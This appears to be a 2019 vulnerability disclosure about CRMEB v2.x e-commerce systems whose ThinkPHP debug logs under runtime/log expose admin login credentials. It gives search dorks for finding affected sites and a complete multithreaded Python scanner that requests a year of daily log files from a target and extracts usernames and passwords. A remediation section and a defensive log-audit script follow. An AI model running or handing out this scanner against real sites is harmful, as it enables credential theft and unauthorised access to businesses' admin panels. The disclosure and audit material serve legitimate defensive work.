
Crmeb runtime log leaks backend login credentials

August 29, 2019

0x01 Vulnerability Overview

CRMEB is a customer and e-commerce management system built on ThinkPHP 5.0 + Vue + EasyWeChat. It is meant to help small and medium-sized businesses quickly build up a customer base, analyse member data, convert customers intelligently, raise sales and maintain members. The root cause of the leak is the one common to systems built as secondary developments on ThinkPHP: the debug switch was left on, so log files were written into the runtime directory, and it is those files that leak.
  • Affected versions: Crmeb v2.x
  • Component dork:
    Powered by CRMEB!
    app:"CRMEB"

0x02 Exploitation

#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# python CRMEB_Log_Disclosure@Coco413.py http://example.com

import re
import sys
import traceback
import warnings
import requests
from urllib.parse import urlparse
from concurrent.futures import ThreadPoolExecutor

requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")


def payloads(base_url):
    # ThinkPHP writes one log file per day, named runtime/log/YYYYMM/DD.log
    year_month = ['201912', '201911', '201910', '201909', '201908', '201907', '201906', '201905', '201904',
                  '201903', '201902', '201901']
    parsed = urlparse(base_url)
    urls = []
    for year in year_month:
        for day in range(1, 32):
            # zero-pad the day (1 -> '01') so it matches the log file name
            urls.append(parsed.scheme + "://" + parsed.hostname + '/runtime/log/' + year + '/' + '%02d' % day + '.log')
    return urls


def scan(url):
    try:
        print("[→] Checking url:", url)
        r = requests.get(url, verify=False, timeout=10)
        r.close()
        # in debug mode the log dumps request parameters as a PHP array,
        # so a login request appears as 'account' => '...', 'pwd' => '...'
        username = re.compile("'account' => '(.*?)'", re.S)
        password = re.compile("'pwd' => '(.*?)'", re.S)
        result = re.findall(password, r.text)
        if result:
            account = re.findall(username, r.text)
            print("[✓] Username:{} | Password:{}".format(account[0] if account else '?', result[0]))
    except (requests.exceptions.ConnectionError, requests.ReadTimeout):
        pass
    except Exception:
        traceback.print_exc()


def main(base_url):
    try:
        with ThreadPoolExecutor(5) as executor:
            executor.map(scan, payloads(base_url))
    except Exception:
        traceback.print_exc()


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.exit('usage: python CRMEB_Log_Disclosure@Coco413.py http://example.com')
    main(sys.argv[1])


0x03 Remediation

Delete the files under runtime/logs and set APP_DEBUG to false.
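A server-side check to go with that fix, added here as an example (it is not from the original post and not CRMEB's own code): it walks a deployment's runtime/log tree for the same 'account' => / 'pwd' => parameter dumps the scanner above looks for, redacts what it finds, and flags a config.php that still has app_debug on. The sample log content, the config key spelling and the file names are constructed assumptions modelled on ThinkPHP 5's per-day log layout.

```python
import re
import tempfile
from pathlib import Path

# Constructed sample of a ThinkPHP 5 debug log entry that dumped a login request's parameters.
SAMPLE_LOG = """[ 2019-08-29T10:12:01+08:00 ] 127.0.0.1 POST /admin/login
[ info ] array (
  'account' => 'admin',
  'pwd' => 'P@ssw0rd-constructed',
)
[ 2019-08-29T10:13:44+08:00 ] 127.0.0.1 GET /index
"""

# Parameter names worth flagging; the first two are the ones the leaked logs actually carry.
SENSITIVE_KEYS = ("account", "pwd", "password", "passwd", "token")
PARAM_RE = re.compile(r"'(%s)'\s*=>\s*'([^']*)'" % "|".join(SENSITIVE_KEYS))
# Assumed ThinkPHP 5 config.php form of the switch the fix turns off: 'app_debug' => true
DEBUG_RE = re.compile(r"""['"]app_debug['"]\s*=>\s*true""", re.I)

def find_leaked_params(text):
    """Return (line_no, key, redacted_value) for each sensitive parameter dumped into a log."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        for key, value in PARAM_RE.findall(line):
            hits.append((n, key, value[:2] + "*" * max(len(value) - 2, 0)))
    return hits

def audit_runtime_logs(runtime_dir):
    """Walk runtime/log/YYYYMM/DD.log and map each file to the secrets it exposes."""
    findings = {}
    for log in sorted(Path(runtime_dir).glob("log/*/*.log")):
        hits = find_leaked_params(log.read_text(errors="replace"))
        if hits:
            findings[str(log)] = hits
    return findings

def debug_enabled(config_text):
    """True while config.php still says 'app_debug' => true."""
    return bool(DEBUG_RE.search(config_text))

def demo():
    """Build a throwaway runtime/ tree holding SAMPLE_LOG and audit it."""
    root = Path(tempfile.mkdtemp()) / "runtime"
    (root / "log" / "201908").mkdir(parents=True)
    (root / "log" / "201908" / "29.log").write_text(SAMPLE_LOG)
    return audit_runtime_logs(root)

if __name__ == "__main__":
    print(demo())
```

Point audit_runtime_logs at the real runtime directory of a deployment to see which day files need deleting before the directory is taken off the web root.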


0x04 References

Sensitive log disclosure in the latest version of CRMEB